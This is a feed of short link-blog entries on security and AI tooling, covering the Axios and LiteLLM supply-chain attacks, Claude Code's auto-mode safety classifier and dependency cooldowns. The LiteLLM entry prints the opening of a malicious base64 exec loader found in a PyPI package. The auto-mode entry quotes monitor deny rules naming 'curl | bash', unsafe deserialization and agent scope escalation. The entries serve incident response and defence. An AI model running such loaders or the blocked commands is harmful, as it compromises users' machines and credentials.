    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vision-llms"&gt;vision-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemma"&gt;gemma&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;&lt;/p&gt;

</summary><category term="google"/><category term="ai"/><category term="generative-ai"/><category term="local-llms"/><category term="llms"/><category term="llm"/><category term="vision-llms"/><category term="pelican-riding-a-bicycle"/><category term="llm-reasoning"/><category term="gemma"/><category term="llm-release"/><category term="lm-studio"/></entry><entry><title>Supply Chain Attack on Axios Pulls Malicious Dependency from npm</title><link href="https://simonwillison.net/2026/Mar/31/supply-chain-attack-on-axios/#atom-blogmarks" rel="alternate"/><published>2026-03-31T23:28:40+00:00</published><updated>2026-03-31T23:28:40+00:00</updated><id>https://simonwillison.net/2026/Mar/31/supply-chain-attack-on-axios/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://socket.dev/blog/axios-npm-package-compromised"&gt;Supply Chain Attack on Axios Pulls Malicious Dependency from npm&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with &lt;a href="https://www.npmjs.com/package/axios"&gt;101 million weekly downloads&lt;/a&gt;. Versions &lt;code&gt;1.14.1&lt;/code&gt; and &lt;code&gt;0.30.4&lt;/code&gt; both included a new dependency called &lt;code&gt;plain-crypto-js&lt;/code&gt; which was freshly published malware, stealing credentials and installing a remote access trojan (RAT).&lt;/p&gt;
&lt;p&gt;It looks like the attack came from a leaked long-lived npm token. Axios have &lt;a href="https://github.com/axios/axios/issues/7055"&gt;an open issue to adopt trusted publishing&lt;/a&gt;, which would ensure that only their GitHub Actions workflows are able to publish to npm. The malware packages were published without an accompanying GitHub release, which strikes me as a useful heuristic for spotting potentially malicious releases - the same pattern was present for LiteLLM &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;last week&lt;/a&gt; as well.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/l57wuc/supply_chain_attack_on_axios"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;

</summary><category term="javascript"/><category term="security"/><category term="npm"/><category term="supply-chain"/></entry><entry><title>Pretext</title><link href="https://simonwillison.net/2026/Mar/29/pretext/#atom-blogmarks" rel="alternate"/><published>2026-03-29T20:08:45+00:00</published><updated>2026-03-29T20:08:45+00:00</updated><id>https://simonwillison.net/2026/Mar/29/pretext/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/chenglou/pretext"&gt;Pretext&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the &lt;a href="https://github.com/chenglou/react-motion"&gt;react-motion&lt;/a&gt; animation library.&lt;/p&gt;
&lt;p&gt;Pretext solves the problem of calculating the height of a paragraph of line-wrapped text &lt;em&gt;without touching the DOM&lt;/em&gt;. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications.&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://chenglou.me/pretext/dynamic-layout/"&gt;one demo&lt;/a&gt; that shows the kind of things this makes possible:&lt;/p&gt;
&lt;video autoplay loop muted playsinline
  poster="https://static.simonwillison.net/static/2026/pretex.jpg"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4"&gt;
&lt;/video&gt;

&lt;p&gt;The key to how this works is the way it separates calculations into a call to a &lt;code&gt;prepare()&lt;/code&gt; function followed by multiple calls to &lt;code&gt;layout()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;prepare()&lt;/code&gt; function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;layout()&lt;/code&gt; function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height.&lt;/p&gt;
&lt;p&gt;I &lt;a href="https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe"&gt;had Claude&lt;/a&gt; build me &lt;a href="https://tools.simonwillison.net/pretext-explainer"&gt;this interactive artifact&lt;/a&gt; to help me visually understand what's going on, based on a simplified version of Pretext itself.&lt;/p&gt;
&lt;p&gt;The way this is tested is particularly impressive. The earlier tests &lt;a href="https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2"&gt;rendered a full copy of the Great Gatsby&lt;/a&gt; in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by &lt;a href="https://github.com/chenglou/pretext/tree/main/corpora"&gt;the corpora/ folder&lt;/a&gt; using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more.&lt;/p&gt;
&lt;p&gt;Cheng Lou &lt;a href="https://twitter.com/_chenglou/status/2037715226838343871"&gt;says&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis&lt;/p&gt;
&lt;p&gt;This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure &amp;amp; iterate against those at every significant container width, running over weeks&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/_chenglou/status/2037713766205608234"&gt;@_chenglou&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/browsers"&gt;browsers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/testing"&gt;testing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/react"&gt;react&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/typescript"&gt;typescript&lt;/a&gt;&lt;/p&gt;

</summary><category term="browsers"/><category term="css"/><category term="javascript"/><category term="testing"/><category term="react"/><category term="typescript"/></entry><entry><title>We Rewrote JSONata with AI in a Day, Saved $500K/Year</title><link href="https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-blogmarks" rel="alternate"/><published>2026-03-27T00:35:01+00:00</published><updated>2026-03-27T00:35:01+00:00</updated><id>https://simonwillison.net/2026/Mar/27/vine-porting-jsonata/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.reco.ai/blog/we-rewrote-jsonata-with-ai"&gt;We Rewrote JSONata with AI in a Day, Saved $500K/Year&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Bit of a hyperbolic framing but this looks like another case study of &lt;strong&gt;vibe porting&lt;/strong&gt;, this time spinning up a new custom Go implementation of the &lt;a href="https://jsonata.org"&gt;JSONata&lt;/a&gt; JSON expression language - similar in focus to jq, and heavily associated with the &lt;a href="https://nodered.org"&gt;Node-RED&lt;/a&gt; platform.&lt;/p&gt;
&lt;p&gt;As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend.&lt;/p&gt;
&lt;p&gt;The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/go"&gt;go&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-porting"&gt;vibe-porting&lt;/a&gt;&lt;/p&gt;

</summary><category term="go"/><category term="json"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="agentic-engineering"/><category term="vibe-porting"/></entry><entry><title>My minute-by-minute response to the LiteLLM malware attack</title><link href="https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-blogmarks" rel="alternate"/><published>2026-03-26T23:58:22+00:00</published><updated>2026-03-26T23:58:22+00:00</updated><id>https://simonwillison.net/2026/Mar/26/response-to-the-litellm-malware-attack/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-attack-transcript/"&gt;My minute-by-minute response to the LiteLLM malware attack&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Callum McMahon reported the &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM malware attack&lt;/a&gt; to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Confirmed&lt;/strong&gt;. Fresh download from PyPI right now in an isolated Docker container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The malicious &lt;code&gt;litellm==1.82.8&lt;/code&gt; is &lt;strong&gt;live on PyPI right now&lt;/strong&gt; and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I was chuffed to see Callum use my &lt;a href="https://github.com/simonw/claude-code-transcripts"&gt;claude-code-transcripts&lt;/a&gt; tool to publish the transcript of the conversation.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47531967"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;

</summary><category term="pypi"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="supply-chain"/><category term="ai-security-research"/></entry><entry><title>Quantization from the ground up</title><link href="https://simonwillison.net/2026/Mar/26/quantization-from-the-ground-up/#atom-blogmarks" rel="alternate"/><published>2026-03-26T16:21:09+00:00</published><updated>2026-03-26T16:21:09+00:00</updated><id>https://simonwillison.net/2026/Mar/26/quantization-from-the-ground-up/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://ngrok.com/blog/quantization"&gt;Quantization from the ground up&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Sam Rose continues &lt;a href="https://simonwillison.net/tags/sam-rose/"&gt;his streak&lt;/a&gt; of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "&lt;a href="https://twitter.com/samwhoo/status/2036845101561835968"&gt;the best post I've ever made&lt;/a&gt;".)&lt;/p&gt;
&lt;p&gt;Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of an interactive float32 binary representation tool showing the value -48.92364502, with color-coded bit fields labeled S (sign), EXPONENT (blue), and SIGNIFICAND (pink), displaying the 32-bit pattern 11000010010000111101100001110100000, and a slider control at the bottom along with minus, plus, and reset buttons." src="https://static.simonwillison.net/static/2026/float.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;I hadn't heard about &lt;strong&gt;outlier values&lt;/strong&gt; in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are &lt;em&gt;very&lt;/em&gt; important to model quality. Removing even a &lt;em&gt;single&lt;/em&gt; "super weight," as Apple calls them, can cause the model to output complete gibberish.&lt;/p&gt;
&lt;p&gt;Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Plus there's a section on &lt;a href="https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy"&gt;How much does quantization affect model accuracy?&lt;/a&gt;. Sam explains the concepts of &lt;strong&gt;perplexity&lt;/strong&gt; and ** KL divergence ** and then uses the &lt;a href="https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity"&gt;llama.cpp perplexity tool&lt;/a&gt; and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B.&lt;/p&gt;
&lt;p&gt;His conclusion:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it.&lt;/p&gt;
&lt;/blockquote&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/computer-science"&gt;computer-science&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/explorables"&gt;explorables&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sam-rose"&gt;sam-rose&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/qwen"&gt;qwen&lt;/a&gt;&lt;/p&gt;

</summary><category term="computer-science"/><category term="ai"/><category term="explorables"/><category term="generative-ai"/><category term="llms"/><category term="sam-rose"/><category term="qwen"/></entry><entry><title>Thoughts on slowing the fuck down</title><link href="https://simonwillison.net/2026/Mar/25/thoughts-on-slowing-the-fuck-down/#atom-blogmarks" rel="alternate"/><published>2026-03-25T21:47:17+00:00</published><updated>2026-03-25T21:47:17+00:00</updated><id>https://simonwillison.net/2026/Mar/25/thoughts-on-slowing-the-fuck-down/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://news.ycombinator.com/item?id=47517539"&gt;Thoughts on slowing the fuck down&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Mario Zechner created the &lt;a href="https://github.com/badlogic/pi-mono"&gt;Pi agent framework&lt;/a&gt; used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Agents and humans both make mistakes, but agent mistakes accumulate much faster:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...]&lt;/p&gt;
&lt;p&gt;With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...]&lt;/p&gt;
&lt;p&gt;You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I think Mario is exactly right about this. Agents let us move &lt;em&gt;so much faster&lt;/em&gt;, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours.&lt;/p&gt;
&lt;p&gt;It's so easy to let the codebase evolve outside of our abilities to reason clearly about it. &lt;a href="https://simonwillison.net/tags/cognitive-debt/"&gt;Cognitive debt&lt;/a&gt; is real.&lt;/p&gt;
&lt;p&gt;Mario recommends slowing down:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code.&lt;/p&gt;
&lt;p&gt;Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed v.s. mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cognitive-debt"&gt;cognitive-debt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;

</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="coding-agents"/><category term="cognitive-debt"/><category term="agentic-engineering"/></entry><entry><title>LiteLLM Hack: Were You One of the 47,000?</title><link href="https://simonwillison.net/2026/Mar/25/litellm-hack/#atom-blogmarks" rel="alternate"/><published>2026-03-25T17:21:04+00:00</published><updated>2026-03-25T17:21:04+00:00</updated><id>https://simonwillison.net/2026/Mar/25/litellm-hack/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://futuresearch.ai/blog/litellm-hack-were-you-one-of-the-47000/"&gt;LiteLLM Hack: Were You One of the 47,000?&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Daniel Hnyk used the &lt;a href="https://console.cloud.google.com/bigquery?p=bigquery-public-data&amp;amp;d=pypi"&gt;BigQuery PyPI dataset&lt;/a&gt; to determine how many downloads there were of &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;the exploited LiteLLM packages&lt;/a&gt; during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8).&lt;/p&gt;
&lt;p&gt;They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/hnykda/status/2036834100342825369"&gt;@hnykda&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;&lt;/p&gt;

</summary><category term="packaging"/><category term="pypi"/><category term="python"/><category term="security"/><category term="supply-chain"/></entry><entry><title>Auto mode for Claude Code</title><link href="https://simonwillison.net/2026/Mar/24/auto-mode-for-claude-code/#atom-blogmarks" rel="alternate"/><published>2026-03-24T23:57:33+00:00</published><updated>2026-03-24T23:57:33+00:00</updated><id>https://simonwillison.net/2026/Mar/24/auto-mode-for-claude-code/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://claude.com/blog/auto-mode"&gt;Auto mode for Claude Code&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Really interesting new development in Claude Code today as an alternative to &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Those safeguards appear to be implemented using Claude Sonnet 4.6, as &lt;a href="https://code.claude.com/docs/en/permission-modes#eliminate-prompts-with-auto-mode"&gt;described in the documentation&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Model&lt;/strong&gt;: the classifier runs on Claude Sonnet 4.6, even if your main session uses a different model.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They ship with an extensive set of default filters, and you can also customize them further with your own rules. The most interesting insight into how they work comes when you run this new command in the terminal:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;claude auto-mode defaults
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://gist.githubusercontent.com/simonw/91863bfd9f7ebf916d1fabb8e6940335/raw/cda3c88e919b8238e85d3f1cc990e8ff48ad9a18/defaults.json"&gt;Here's the full JSON output&lt;/a&gt;. It's pretty long, so here's an illustrative subset:&lt;/p&gt;
&lt;p&gt;From the "allow" list:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Test Artifacts: Hardcoded test API keys, placeholder credentials in examples, or hardcoding test cases&lt;/li&gt;
&lt;li&gt;Local Operations: Agent deleting local files in working directory, local file operations within project scope, or using &lt;code&gt;--ignore-certificate-errors&lt;/code&gt; for local testing. "Project scope" means the repository the session started in — wandering into ~/, ~/Library/, /etc, or other repos is scope escalation (User Intent Rule #2), not a local operation. Does NOT cover irreversible destruction of pre-existing files or local stateful services — see "Irreversible Local Destruction" in BLOCK.&lt;/li&gt;
&lt;li&gt;Read-Only Operations: GET requests, read-only API calls, or queries that don't modify state and don't contain sensitive information in the URL. Note: PREEMPTIVE BLOCK ON CLEAR INTENT still applies — if the transcript contains clear evidence the agent is using read-only operations to scout for a blocked action, block it.&lt;/li&gt;
&lt;li&gt;Declared Dependencies: Installing packages that are already declared in the repo's manifest files (requirements.txt, package.json, Cargo.toml, pyproject.toml, Gemfile, etc.) via standard commands that read those manifests (&lt;code&gt;pip install -r requirements.txt&lt;/code&gt;, &lt;code&gt;npm install&lt;/code&gt;, &lt;code&gt;cargo build&lt;/code&gt;, &lt;code&gt;bundle install&lt;/code&gt;) — provided the agent has not modified the manifest in this session. Does NOT cover installing agent-chosen package names (e.g. &lt;code&gt;pip install foo&lt;/code&gt;, &lt;code&gt;npm install bar&lt;/code&gt;) — those carry typosquat and supply-chain risk. [...]&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;From "soft_deny":&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Git Destructive: Force pushing (&lt;code&gt;git push --force&lt;/code&gt;), deleting remote branches, or rewriting remote history&lt;/li&gt;
&lt;li&gt;Git Push to Default Branch: Pushing directly to main, master, or the repository's default branch — this bypasses pull request review. Commits should be pushed to a new feature branch instead.
-Code from External: Downloading and executing code from external sources — e.g. &lt;code&gt;curl | bash&lt;/code&gt;, deserializing external data via formats that can execute code (eval, exec, yaml.unsafe_load, pickle, etc), or similar mechanisms. Also includes running code from an external repo cloned earlier in the transcript (pip install -e, make install, python script.py, pickle.load/torch.load on cloned repo files) — "local on disk" does not mean trusted if it was cloned from an external source visible in the transcript. The repo the agent starts in is trusted.&lt;/li&gt;
&lt;li&gt;Cloud Storage Mass Delete: Deleting or mass modifying files on cloud storage (S3, GCS, Azure Blob, etc.) [...]&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;I remain unconvinced by prompt injection protections that rely on AI, since they're non-deterministic by nature. The documentation does warn that this may still let things through:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The classifier may still allow some risky actions: for example, if user intent is ambiguous, or if Claude doesn't have enough context about your environment to know an action might create additional risk.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The fact that the default allow list includes &lt;code&gt;pip install -r requirements.txt&lt;/code&gt; also means that this wouldn't protect against supply chain attacks with unpinned dependencies, as seen this morning &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;with LiteLLM&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I still want my coding agents to run in a robust sandbox by default, one that restricts file access and network connections in a deterministic way. I trust those a whole lot more than prompt-based protections like this new auto mode.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-injection"&gt;prompt-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;&lt;/p&gt;

</summary><category term="security"/><category term="ai"/><category term="prompt-injection"/><category term="generative-ai"/><category term="llms"/><category term="coding-agents"/><category term="claude-code"/></entry><entry><title>Package Managers Need to Cool Down</title><link href="https://simonwillison.net/2026/Mar/24/package-managers-need-to-cool-down/#atom-blogmarks" rel="alternate"/><published>2026-03-24T21:11:38+00:00</published><updated>2026-03-24T21:11:38+00:00</updated><id>https://simonwillison.net/2026/Mar/24/package-managers-need-to-cool-down/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://nesbitt.io/2026/03/04/package-managers-need-to-cool-down.html"&gt;Package Managers Need to Cool Down&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Today's &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM supply chain attack&lt;/a&gt; inspired me to revisit the idea of &lt;a href="https://simonwillison.net/2025/Nov/21/dependency-cooldowns/"&gt;dependency cooldowns&lt;/a&gt;, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.&lt;/p&gt;
&lt;p&gt;This recent piece (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates"&gt;pnpm 10.16&lt;/a&gt; (September 2025) — &lt;code&gt;minimumReleaseAge&lt;/code&gt; with &lt;code&gt;minimumReleaseAgeExclude&lt;/code&gt; for trusted packages&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/yarnpkg/berry/releases/tag/%40yarnpkg%2Fcli%2F4.10.0"&gt;Yarn 4.10.0&lt;/a&gt; (September 2025) — &lt;code&gt;npmMinimalAgeGate&lt;/code&gt; (in minutes) with &lt;code&gt;npmPreapprovedPackages&lt;/code&gt; for exemptions&lt;/li&gt;
